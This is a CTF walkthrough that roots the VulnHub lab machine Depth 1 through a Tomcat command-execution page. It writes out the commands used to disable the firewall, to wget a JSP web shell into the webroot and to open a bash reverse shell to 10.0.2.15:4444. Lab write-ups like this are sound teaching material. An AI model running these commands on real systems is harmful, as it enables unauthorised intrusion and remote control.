Depth 1 – CTF Walkthrough
Depth 1 is a relatively new machine that surfaced on VulnHub on October 27th, 2017. It is created by Dan Lawson. It can be downloaded from https://www.vulnhub.com/entry/depth-1,213/
The objective of the machine is to gain root privileges and read the flag.
I will be using Kali 2017.1 as my target machine running on VirtualBox, and I will be running the victim machine, Depth 1, on VirtualBox as well.
Once booted, this is what the machine looks like:
After going through so many machines, I like the fact that the IP is displayed on the login.
Since we have the IP, let’s scan and see what all ports are open:
As we can see, an Apache Tomcat server is running on port 8080. Let’s head over there and see what’s happening:
I tried using the basic combination of the username and password to login via the Manager web app, but nothing worked:
I also tried using auxiliary/scanner/http/tomcat_mgr_login via Metasploit, but even that did not work:
I then decided to run Nikto, and see if that will show me something that I could use or not:
And it did. I went back to the web app and opened the file:
When I tried the command mentioned on the page, it gave me a result of the directory listing of the folder /tmp:
Exploring further, I see that the user Bill, has an ssh directory and a file called sudo_as_admin_successfull but when scanning for ports, I could not find port 22 open which could mean that there is a firewall in place:
However, before, I want to check the path of this page and see if there’s a way I can upload a JSP shell to it:
I run the following command to check the permission:
sh -c $@|sh . echo ssh bill@localhost sudo -l
The first thing I do is disable the firewall by:
sh -c $@|sh . echo ssh bill@localhost sudo ufw disable
Now that the firewall is down, it is time to upload a JSP shell.
I used the code from the following site: https://blog.netspi.com/hacking-with-jsp-shells/
Moreover, saved it as shell.jsp on my Desktop.
Next, I start a simple python HTTP server to host the file:
I will be uploading the file to the path where test.jsp is hosted which is: /var/lib/tomcat8/webapps/ROOT/
Next, I type the following command in test.jsp to upload the JSP shell:
sh -c $@|sh . echo ssh bill@localhost sudo wget “http://10.0.2.15:8000/shell.jsp” -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
and as you can see, our shell.jsp has been uploaded successfully:
Now it’s time to get a remote connection:
and on the shell, we write:
ssh bill@localhost sudo bash -i>& /dev/tcp/10.0.2.15/4444 0>&1
and we are root!! Here’s the flag: